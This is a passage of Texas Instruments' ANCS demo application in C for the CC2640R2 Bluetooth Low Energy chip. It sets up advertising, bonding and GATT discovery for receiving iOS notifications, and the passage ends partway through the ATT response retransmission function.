"text": "/******************************************************************************\n\n @file ancs_app.c\n\n @brief This file contains the ANCS Application sample application for use\n with the CC2640R2 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *****************************************************************************/\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/display/Display.h>\n\n#include <icall.h>\n#include \"util.h\"\n/* This Header file contains all BLE API and icall structure definition */\n#include \"icall_ble_api.h\"\n\n#include \"devinfoservice.h\"\n\n#include \"ll_common.h\"\n\n#include \"peripheral.h\"\n\n#ifdef USE_RCOSC\n#include \"rcosc_calibration.h\"\n#endif //USE_RCOSC\n\n#include \"board.h\"\n\n// ANCS App includes.\n#include \"board_key.h\"\n#include \"ancs_app.h\"\n#include \"ancs.h\"\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// Advertising interval when device is discoverable (units of 625us, 160=100ms)\n#define DEFAULT_ADVERTISING_INTERVAL 160\n\n// General discoverable mode: advertise indefinitely\n#define DEFAULT_DISCOVERABLE_MODE GAP_ADTYPE_FLAGS_GENERAL\n\n// Minimum connection interval (units of 1.25ms, 80=100ms) for automatic\n// parameter update request\n#define DEFAULT_DESIRED_MIN_CONN_INTERVAL 6\n\n// Maximum connection interval (units of 1.25ms, 800=1000ms) for automatic\n// parameter update request\n#define DEFAULT_DESIRED_MAX_CONN_INTERVAL 6\n\n// Slave latency to use for automatic parameter update request\n#define DEFAULT_DESIRED_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms, 1000=10s) for automatic parameter\n// update request\n#define DEFAULT_DESIRED_CONN_TIMEOUT 1000\n\n// After the connection is formed, the peripheral waits until the central\n// device asks for its preferred connection parameters\n#define DEFAULT_ENABLE_UPDATE_REQUEST GAPROLE_LINK_PARAM_UPDATE_WAIT_REMOTE_PARAMS\n\n// Connection Pause Peripheral time value (in seconds)\n#define DEFAULT_CONN_PAUSE_PERIPHERAL 6\n\n// How often to perform periodic event (in msec)\n#define ANCSAPP_PERIODIC_EVT_PERIOD 5000\n\n// Application specific event ID for HCI Connection Event End Events\n#define ANCSAPP_HCI_CONN_EVT_END_EVT 0x0001\n\n// Type of Display to open\n#if !defined(Display_DISABLE_ALL)\n #if defined(BOARD_DISPLAY_USE_LCD) && (BOARD_DISPLAY_USE_LCD!=0)\n #define ANCSAPP_DISPLAY_TYPE Display_Type_LCD\n #elif defined (BOARD_DISPLAY_USE_UART) && (BOARD_DISPLAY_USE_UART!=0)\n #define ANCSAPP_DISPLAY_TYPE Display_Type_UART\n #else // !BOARD_DISPLAY_USE_LCD && !BOARD_DISPLAY_USE_UART\n #define ANCSAPP_DISPLAY_TYPE 0 // Option not supported\n #endif // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n#else // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n #define ANCSAPP_DISPLAY_TYPE 0 // No Display\n#endif // !Display_DISABLE_ALL\n\n// Task configuration\n#define ANCSAPP_TASK_PRIORITY 1\n\n#ifndef ANCSAPP_TASK_STACK_SIZE\n#define ANCSAPP_TASK_STACK_SIZE 644\n#endif\n\n#define IO_BUTTON_LEFT 8\n\n#define IO_BUTTON_RIGHT 16\n\n#define IO_BUTTON_BOTH 24\n\n// ANCS: 7905F431-B5CE-4E99-A40F-4B1E122D00D0\n#define ANCSAPP_ANCS_SVC_UUID 0xD0, 0x00, 0x2D, 0x12, 0x1E, 0x4B, 0x0F, 0xA4, 0x99, 0x4E, 0xCE, 0xB5, 0x31, 0xF4, 0x05, 0x79\n// Notification Source: UUID 9FBF120D-6301-42D9-8C58-25E699A21DBD (notifiable)\n#define ANCSAPP_NOTIF_SRC_CHAR_UUID 0x1DBD\n// Control point: UUID 69D1D8F3-45E1-49A8-9821-9BBDFDAAD9D9 (writable with response)\n#define ANCSAPP_CTRL_PT_CHAR_UUID 0xD9D9\n// Data Source: UUID 22EAC6E9-24D6-4BB5-BE44-B36ACE7C7BFB (notifiable)\n#define ANCSAPP_DATA_SRC_CHAR_UUID 0x7BFB\n\n#define CHAR_DESC_HDL_UUID128_LEN 21 // (5 + 16) bytes = 21 bytes.\n\n#define NUMBER_OF_ANCS_CHARS 3\n\n#define LAST_ANCS_CHAR 1\n\n#ifdef USE_WATCHDOG_TIMER\n #define WATCHDOG_TIMER_TIMEOUT_PERIOD 1500000 * 5 // 1 second * 5\n #define ANCSAPP_PERIODIC_EVT Event_Id_02\n#endif\n\n// Application events\n#define ANCSAPP_STATE_CHANGE_EVT 0x0001\n#define ANCSAPP_CHAR_CHANGE_EVT 0x0002\n#define ANCSAPP_PAIRING_STATE_EVT 0x0004\n#define ANCSAPP_PASSCODE_NEEDED_EVT 0x0008\n\n#define ANCSAPP_START_DISC_EVT Event_Id_00\n#define ANCSAPP_KEY_CHANGE_EVT Event_Id_01\n\n\n// Internal Events for RTOS application.\n#define ANCSAPP_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define ANCSAPP_QUEUE_EVT UTIL_QUEUE_EVENT_ID // Event_Id_30\n\n\n// Bitwise OR of all events to pend on.\n#ifdef USE_WATCHDOG_TIMER\n #define ANCSAPP_ALL_EVENTS (ANCSAPP_ICALL_EVT | \\\n ANCSAPP_QUEUE_EVT | \\\n ANCSAPP_KEY_CHANGE_EVT | \\\n ANCSAPP_START_DISC_EVT | \\\n ANCSAPP_PERIODIC_EVT)\n#else\n #define ANCSAPP_ALL_EVENTS (ANCSAPP_ICALL_EVT | \\\n ANCSAPP_QUEUE_EVT | \\\n ANCSAPP_KEY_CHANGE_EVT | \\\n ANCSAPP_START_DISC_EVT)\n#endif\n\n// Application states\nenum\n{\n ANCS_STATE_IDLE = 0,\n ANCS_STATE_DISCOVERY,\n ANCS_STATE_READY,\n};\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header.\n uint8_t *pData; // event data\n} ancsAppEvt_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n// Store discovered handles\nuint16_t Ancs_handleCache[HDL_CACHE_LEN];\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n// Watchdog handle\nWatchdog_Handle watchdogHandle;\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\nstatic uint8_t discoveryState = ANCS_EXCHANGE_MTU;\n\n// The handle Cache of the ANCS.\nstatic uint8_t ancsAppState = ANCS_STATE_IDLE;\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n#ifdef USE_WATCHDOG_TIMER\n // Clock instances for internal periodic events.\n static Clock_Struct periodicClock;\n#endif\n\n// Queue object used for app messages\nstatic Queue_Struct appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct ancsAppTask;\nChar ancsAppTaskStack[ANCSAPP_TASK_STACK_SIZE];\n\n// Scan response data (max size = 31 bytes)\nstatic uint8_t scanRspData[] =\n{\n // complete name\n 0x0A,// length of this data\n GAP_ADTYPE_LOCAL_NAME_COMPLETE, 'A', 'N', 'C', 'S', ' ', 'D', 'e', 'm', 'o',\n\n // connection interval range\n 0x05, // length of this data\n GAP_ADTYPE_SLAVE_CONN_INTERVAL_RANGE,\n LO_UINT16(DEFAULT_DESIRED_MIN_CONN_INTERVAL), // 100ms\n HI_UINT16(DEFAULT_DESIRED_MIN_CONN_INTERVAL),\n LO_UINT16(DEFAULT_DESIRED_MAX_CONN_INTERVAL), // 1s\n HI_UINT16(DEFAULT_DESIRED_MAX_CONN_INTERVAL),\n\n // Tx power level\n 0x02, // length of this data\n GAP_ADTYPE_POWER_LEVEL,\n 0 // 0dBm\n};\n\n// Advertisement data (max size = 31 bytes, though this is\n// best kept short to conserve power while advertising)\nstatic uint8_t advertData[] =\n{\n // Flags; this sets the device to use limited discoverable\n // mode (advertises for 30 seconds at a time) instead of general\n // discoverable mode (advertises indefinitely)\n 0x02,// length of this data\n GAP_ADTYPE_FLAGS,\n DEFAULT_DISCOVERABLE_MODE | GAP_ADTYPE_FLAGS_BREDR_NOT_SUPPORTED,\n // Service Solicitation: this peripheral (NC) is looking for the ANCS\n // on the iOS device. As per Apple Bluetooth Design Guidelines, soliciting\n // the ANCS will cause the device to show up in the iOS settings app.\n 0x11, // length of this data\n GAP_ADTYPE_SERVICES_LIST_128BIT,\n // The ANCS's UUID.\n ANCSAPP_ANCS_SVC_UUID\n};\n\n// GAP GATT Attributes\nstatic uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"ANCS Demo\";\n\n// Globals used for ATT Response retransmission\nstatic gattMsgEvent_t *pAttRsp = NULL;\nstatic uint8_t rspTxRetry = 0;\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\n\nstatic void AncsApp_init( void );\nstatic void AncsApp_taskFxn(UArg a0, UArg a1);\nstatic uint8_t AncsApp_processStackMsg(ICall_Hdr *pMsg);\nstatic uint8_t AncsApp_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void AncsApp_processAppMsg(ancsAppEvt_t *pMsg);\nstatic void AncsApp_processStateChangeEvt(gaprole_States_t newState);\nstatic void AncsApp_sendAttRsp(void);\nstatic void AncsApp_freeAttRsp(uint8_t status);\nstatic void AncsApp_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle, uint8_t uiInputs, uint8_t uiOutputs);\nstatic void AncsApp_pairStateCB(uint16_t connHandle, uint8_t state, uint8_t status);\nstatic void AncsApp_processPairState(uint8_t state, uint8_t status);\nstatic void AncsApp_processPasscode(uint8_t uiOutputs);\nstatic void AncsApp_stateChangeCB(gaprole_States_t newState);\nstatic uint8_t AncsApp_enqueueMsg(uint8_t event, uint8_t state, uint8_t *pData);\n/********************ANCS APP FUNCTIONS********************/\n// Board I/O\nstatic void AncsApp_keyPressCB(uint8 keys);\nstatic void AncsApp_handleKeysEvt(uint8_t keys);\n\n// ANCS service discovery\nstatic void AncsApp_discoverService(gattMsgEvent_t *pMsg);\n\n#ifdef USE_WATCHDOG_TIMER\n /********************WATCHDOG FUNCTIONS********************/\n static void watchdogCallback(uintptr_t unused);\n static void AncsApp_performPeriodicTask(void);\n static void AncsApp_clockHandler(UArg arg);\n#endif\n\n/*********************************************************************\n * EXTERN FUNCTIONS\n */\nextern void AssertHandler(uint8 assertCause, uint8 assertSubcause);\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// Peripheral GAPRole Callbacks\nstatic gapRolesCBs_t ancsApp_gapRoleCBs =\n{\n AncsApp_stateChangeCB // GAPRole State Change Callbacks\n};\n\n// GAP Bond Manager Callbacks\n// These are set to NULL since they are not needed. The application\n// is set up to only perform justworks pairing.\nstatic gapBondCBs_t ancsApp_BondMgrCBs =\n{\n (pfnPasscodeCB_t) AncsApp_passcodeCB, // Passcode callback\n AncsApp_pairStateCB // Pairing / Bonding state Callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn AncsApp_createTask\n *\n * @brief Task creation function for the ANCS app.\n *\n * @param None.\n *\n * @return None.\n */\nvoid AncsApp_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = ancsAppTaskStack;\n taskParams.stackSize = ANCSAPP_TASK_STACK_SIZE;\n taskParams.priority = ANCSAPP_TASK_PRIORITY;\n\n Task_construct(&ancsAppTask, AncsApp_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn AncsApp_init\n *\n * @brief Called during initialization and contains application\n * specific initialization (ie. hardware initialization/setup,\n * table initialization, power up notification, etc), and\n * profile initialization/setup.\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AncsApp_init(void)\n{\n // ******************************************************************\n // N0 STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_MINUS_21_DBM);\n\n#ifdef USE_RCOSC\n RCOSC_enableCalibration();\n#endif // USE_RCOSC\n\n // Create an RTOS queue for message from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n // Initialize the CC2640r2's I/O\n Board_initKeys(AncsApp_keyPressCB);\n\n dispHandle = Display_open(ANCSAPP_DISPLAY_TYPE, NULL);\n\n#ifdef USE_WATCHDOG_TIMER\n // Create one-shot clocks for internal periodic events.\n Util_constructClock(&periodicClock, AncsApp_clockHandler,\n ANCSAPP_PERIODIC_EVT_PERIOD, 0, false, ANCSAPP_PERIODIC_EVT);\n\n // Call watchdog init functions\n Watchdog_init();\n Watchdog_Params params;\n params.callbackFxn = (Watchdog_Callback)watchdogCallback;\n params.resetMode = Watchdog_RESET_ON;\n params.debugStallMode = Watchdog_DEBUG_STALL_ON;\n watchdogHandle = Watchdog_open(Board_WATCHDOG0, ¶ms);\n // 5 * 1 seconds.\n Watchdog_setReload(watchdogHandle, WATCHDOG_TIMER_TIMEOUT_PERIOD);\n#endif\n\n // Set GAP Parameters: After a connection was established, delay in seconds\n // before sending when GAPRole_SetParameter(GAPROLE_PARAM_UPDATE_ENABLE,...)\n // uses GAPROLE_LINK_PARAM_UPDATE_INITIATE_BOTH_PARAMS or\n // GAPROLE_LINK_PARAM_UPDATE_INITIATE_APP_PARAMS\n // For current defaults, this has no effect.\n GAP_SetParamValue(TGAP_CONN_PAUSE_PERIPHERAL, DEFAULT_CONN_PAUSE_PERIPHERAL);\n\n // Setup the Peripheral GAPRole Profile. For more information see the User's\n // Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html/\n {\n // Device starts advertising upon initialization of GAP\n uint8_t initialAdvertEnable = TRUE;\n\n // By setting this to zero, the device will go into the waiting state after\n // being discoverable for 30.72 second, and will not being advertising again\n // until re-enabled by the application\n uint16_t advertOffTime = 0;\n\n uint8_t enableUpdateRequest = DEFAULT_ENABLE_UPDATE_REQUEST;\n uint16_t desiredMinInterval = DEFAULT_DESIRED_MIN_CONN_INTERVAL;\n uint16_t desiredMaxInterval = DEFAULT_DESIRED_MAX_CONN_INTERVAL;\n uint16_t desiredSlaveLatency = DEFAULT_DESIRED_SLAVE_LATENCY;\n uint16_t desiredConnTimeout = DEFAULT_DESIRED_CONN_TIMEOUT;\n\n // Set the Peripheral GAPRole Parameters\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &initialAdvertEnable);\n GAPRole_SetParameter(GAPROLE_ADVERT_OFF_TIME, sizeof(uint16_t),\n &advertOffTime);\n\n GAPRole_SetParameter(GAPROLE_SCAN_RSP_DATA, sizeof(scanRspData), scanRspData);\n GAPRole_SetParameter(GAPROLE_ADVERT_DATA, sizeof(advertData), advertData);\n\n GAPRole_SetParameter(GAPROLE_PARAM_UPDATE_ENABLE, sizeof(uint8_t),\n &enableUpdateRequest);\n GAPRole_SetParameter(GAPROLE_MIN_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMinInterval);\n GAPRole_SetParameter(GAPROLE_MAX_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMaxInterval);\n GAPRole_SetParameter(GAPROLE_SLAVE_LATENCY, sizeof(uint16_t),\n &desiredSlaveLatency);\n GAPRole_SetParameter(GAPROLE_TIMEOUT_MULTIPLIER, sizeof(uint16_t),\n &desiredConnTimeout);\n }\n\n // Set the Device Name characteristic in the GAP GATT Service\n // For more information, see the section in the User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN, attDeviceName);\n\n // Set GAP Parameters to set the advertising interval\n // For more information, see the GAP section of the User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html\n {\n // Use the same interval for general and limited advertising.\n // Note that only general advertising will occur based on the above configuration\n uint16_t advInt = DEFAULT_ADVERTISING_INTERVAL;\n\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MAX, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MAX, advInt);\n }\n\n // Setup the GAP Bond Manager. For more information see the section in the\n // User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html/\n {\n // Don't send a pairing request after connecting; the peer device must\n // initiate pairing\n uint8_t pairMode = GAPBOND_PAIRING_MODE_WAIT_FOR_REQ;\n // Use authenticated pairing: require passcode.\n uint8_t mitm = TRUE;\n // This device only has display capabilities. Therefore, it will display the\n // passcode during pairing. However, since the default passcode is being\n // used, there is no need to display anything.\n uint8_t ioCap = GAPBOND_IO_CAP_NO_INPUT_NO_OUTPUT;\n // Request bonding (storing long-term keys for re-encryption upon subsequent\n // connections without repairing)\n uint8_t bonding = TRUE;\n\n GAPBondMgr_SetParameter(GAPBOND_PAIRING_MODE, sizeof(uint8_t), &pairMode);\n GAPBondMgr_SetParameter(GAPBOND_MITM_PROTECTION, sizeof(uint8_t), &mitm);\n GAPBondMgr_SetParameter(GAPBOND_IO_CAPABILITIES, sizeof(uint8_t), &ioCap);\n GAPBondMgr_SetParameter(GAPBOND_BONDING_ENABLED, sizeof(uint8_t), &bonding);\n }\n\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP GATT Service\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT Service\n DevInfo_AddService(); // Device Information Service\n\n // For ANCS, the device must register an a GATT client, whereas the\n // iPhone acts as a GATT server.\n VOID GATT_InitClient();\n GATT_RegisterForInd(selfEntity);\n\n // Start the Device\n VOID GAPRole_StartDevice(&ancsApp_gapRoleCBs);\n\n // Start Bond Manager and register callback\n VOID GAPBondMgr_Register(&ancsApp_BondMgrCBs);\n\n // Register with GAP for HCI/Host messages. This is needed to receive HCI\n // events. For more information, see the section in the User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n //Set default values for Data Length Extension\n {\n //Set initial values to maximum, RX is set to max. by default(251 octets, 2120us)\n #define APP_SUGGESTED_PDU_SIZE 251 //default is 27 octets(TX)\n #define APP_SUGGESTED_TX_TIME 2120 //default is 328us(TX)\n\n //This API is documented in hci.h\n //See the LE Data Length Extension section in the BLE-Stack User's Guide for information on using this command:\n //http://software-dl.ti.com/lprf/sdg-latest/html/cc2640/index.html\n //HCI_LE_WriteSuggestedDefaultDataLenCmd(APP_SUGGESTED_PDU_SIZE, APP_SUGGESTED_TX_TIME);\n }\n\n#if !defined (USE_LL_CONN_PARAM_UPDATE)\n // Get the currently set local supported LE features\n // The HCI will generate an HCI event that will get received in the main\n // loop\n HCI_LE_ReadLocalSupportedFeaturesCmd();\n#endif // !defined (USE_LL_CONN_PARAM_UPDATE)\n\n Display_print0(dispHandle, 0, 0, \"ANCS Demo\");\n}\n\n/*********************************************************************\n * @fn AncsApp_taskFxn\n *\n * @brief Application task entry point for the ANCS App.\n *\n * @param a0, a1 - not used.\n *\n * @return None.\n */\nstatic void AncsApp_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n AncsApp_init();\n\n // Application main loop\n for (;;)\n {\n uint32_t events;\n\n // Waits for an event to be posted associated with the calling thread.\n // Note that an event associated with a thread is posted when a\n // message is queued to the message receive queue of the thread\n events = Event_pend(syncEvent, Event_Id_NONE, ANCSAPP_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n // Fetch any available messages that might have been sent from the stack\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n uint8 safeToDealloc = TRUE;\n\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n ICall_Stack_Event *pEvt = (ICall_Stack_Event *)pMsg;\n\n // Check for BLE stack events first\n if (pEvt->signature == 0xffff)\n {\n // The GATT server might have returned a blePending as it was trying\n // to process an ATT Response. Now that we finished with this\n // connection event, let's try sending any remaining ATT Responses\n // on the next connection event.\n if (pEvt->event_flag & ANCSAPP_HCI_CONN_EVT_END_EVT)\n {\n // Try to retransmit pending ATT Response (if any)\n AncsApp_sendAttRsp();\n }\n }\n else\n {\n // Process inter-task message\n safeToDealloc = AncsApp_processStackMsg((ICall_Hdr *)pMsg);\n }\n }\n\n if (pMsg && safeToDealloc)\n {\n ICall_freeMsg(pMsg);\n }\n }\n\n // If RTOS queue is not empty, process app message.\n if (events & ANCSAPP_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n ancsAppEvt_t *pMsg = (ancsAppEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message.\n AncsApp_processAppMsg(pMsg);\n\n // Free the space from the message.\n ICall_free(pMsg);\n }\n }\n }\n // Service discovery event.\n if (events & ANCSAPP_START_DISC_EVT)\n {\n //This event will kick off service discovery.\n //The event is only called once, when the GAPROLE is connected\n // discoveryState = ANCS_DISC_SERVICE;\n AncsApp_discoverService(NULL);\n }\n#ifdef USE_WATCHDOG_TIMER\n // Periodic Event for the WDT\n if (events & ANCSAPP_PERIODIC_EVT)\n {\n Util_startClock(&periodicClock);\n\n // Perform periodic application task\n AncsApp_performPeriodicTask();\n }\n#endif\n }\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_processStackMsg\n *\n * @brief Process an incoming stack message.\n *\n * @param pMsg - message to process\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t AncsApp_processStackMsg(ICall_Hdr *pMsg)\n{\n uint8_t safeToDealloc = TRUE;\n\n switch (pMsg->event)\n {\n case GATT_MSG_EVENT:\n // Process GATT message\n safeToDealloc = AncsApp_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n // Process HCI Command Complete Event\n {\n\n#if !defined (USE_LL_CONN_PARAM_UPDATE)\n // This code will disable the use of the LL_CONNECTION_PARAM_REQ\n // control procedure (for connection parameter updates, the\n // L2CAP Connection Parameter Update procedure will be used\n // instead). To re-enable the LL_CONNECTION_PARAM_REQ control\n // procedures, define the symbol USE_LL_CONN_PARAM_UPDATE\n // The L2CAP Connection Parameter Update procedure is used to\n // support a delta between the minimum and maximum connection\n // intervals required by some iOS devices.\n\n // Parse Command Complete Event for opcode and status\n hciEvt_CmdComplete_t* command_complete = (hciEvt_CmdComplete_t*) pMsg;\n uint8_t pktStatus = command_complete->pReturnParam[0];\n\n //find which command this command complete is for\n switch (command_complete->cmdOpcode)\n {\n case HCI_LE_READ_LOCAL_SUPPORTED_FEATURES:\n {\n if (pktStatus == SUCCESS)\n {\n uint8_t featSet[8];\n\n // Get current feature set from received event (bits 1-9\n // of the returned data\n memcpy( featSet, &command_complete->pReturnParam[1], 8 );\n\n // Clear bit 1 of byte 0 of feature set to disable LL\n // Connection Parameter Updates\n CLR_FEATURE_FLAG( featSet[0], LL_FEATURE_CONN_PARAMS_REQ );\n\n // Update controller with modified features\n HCI_EXT_SetLocalSupportedFeaturesCmd( featSet );\n }\n }\n break;\n\n default:\n //do nothing\n break;\n }\n#endif // !defined (USE_LL_CONN_PARAM_UPDATE)\n\n }\n break;\n\n case HCI_BLE_HARDWARE_ERROR_EVENT_CODE:\n AssertHandler(HAL_ASSERT_CAUSE_HARDWARE_ERROR,0);\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n // do nothing\n break;\n\n }\n\n return (safeToDealloc);\n}\n\n/*********************************************************************\n * @fn AncsApp_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t AncsApp_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n // Assume that all initial GATT messages pertain to the discovery\n // process while the app is in the ANCS_STATE_DISCOVERY state.\n if(ancsAppState == ANCS_STATE_DISCOVERY)\n {\n AncsApp_discoverService(pMsg);\n }\n else if (pMsg->method == ATT_FLOW_CTRL_VIOLATED_EVENT)\n {\n // ATT request-response or indication-confirmation flow control is\n // violated. All subsequent ATT requests or indications will be dropped.\n // The app is informed in case it wants to drop the connection.\n\n // Display the opcode of the message that caused the violation.\n Display_print1(dispHandle, 5, 0, \"FC Violated: %d\", pMsg->msg.flowCtrlEvt.opcode);\n }\n else if (pMsg->method == ATT_HANDLE_VALUE_NOTI || pMsg->method == ATT_HANDLE_VALUE_IND)\n {\n // If we receive a GATT notification, we can assume it pertains to ANCS\n // because we only subscribe to notifications from the Notification Source\n // ancs Data Source.\n\n // This variable is used just to make the code look clearer for the\n // two conditionals below :)\n uint8_t notifHandle = pMsg->msg.handleValueNoti.handle;\n\n // Check if the handle matches the handle of the Notification Source\n // stored in the handle cache. If so, store the notification in the queue.\n if ( notifHandle == Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START])\n {\n Ancs_queueNewNotif(pMsg);\n }\n\n // If it is not from the Notification Source we check to see if it is from\n // the Data Source by checking if the handle is equal to the Data Source\n // Start handle stored in the cache. If so, process the data it holds,\n // and ask for more.\n else if ( notifHandle == Ancs_handleCache[ANCS_DATA_SRC_HDL_START])\n Ancs_processDataServiceNotif(pMsg);\n\n }\n //ANCS requires authentication, if the NP attempts to read/write chars on the\n //NP without proper authentication, the NP will respond with insufficent_athen\n //error to which we must respond with a slave security request\n else if (pMsg->method == ATT_ERROR_RSP &&\n pMsg->msg.errorRsp.reqOpcode == ATT_WRITE_REQ &&\n pMsg->msg.errorRsp.errCode == ATT_ERR_INSUFFICIENT_AUTHEN)\n {\n uint16 conn_handle;\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &conn_handle);\n uint8_t mitm;\n uint8_t bonding;\n GAPBondMgr_GetParameter(GAPBOND_MITM_PROTECTION, &mitm);\n GAPBondMgr_GetParameter(GAPBOND_BONDING_ENABLED, &bonding);\n uint8_t authRequest = ((mitm & 0x01) << 2) | ((bonding & 0x01) << 1) | (bonding & 0x01);\n\n discoveryState = ANCS_DISC_FINISH;\n ancsAppState = ANCS_STATE_READY;\n GAP_SendSlaveSecurityRequest(conn_handle, authRequest);\n }\n else if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. Let's try to retransmit the response\n // on the next connection event.\n if (HCI_EXT_ConnEventNoticeCmd(pMsg->connHandle, selfEntity,\n ANCSAPP_HCI_CONN_EVT_END_EVT) == SUCCESS)\n {\n // First free any pending response\n AncsApp_freeAttRsp(FAILURE);\n\n // Hold on to the response message for retransmission\n pAttRsp = pMsg;\n\n // Don't free the response message yet\n return (FALSE);\n }\n }\n //If we have received a read or write response, assume that it is related to\n //CCCD configuration\n else if (pMsg->method == ATT_READ_RSP || pMsg->method == ATT_WRITE_RSP)\n {\n }\n //Otherwise subscribe to notification source if ANCS discovery is complete\n else\n {\n }\n // Free message payload. Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n\n // It's safe to free the incoming message\n return (TRUE);\n}\n\n/*********************************************************************\n * @fn AncsApp_sendAttRsp\n *\n * @brief Send a pending ATT response message.\n *\n * @param none\n *\n * @return none\n */\nstatic void AncsApp_sendAttRsp(void)\n{\n // See if there's a pending ATT Response to be transmitted\n if (pAttRsp != NULL)\n {\n uint8_t status;\n\n // Increment retransmission count\n rspTxRetry++;\n\n // Try to retransmit ATT response till either we're successful or\n // the ATT Client times out (after 30s) and drops the connection.\n status = 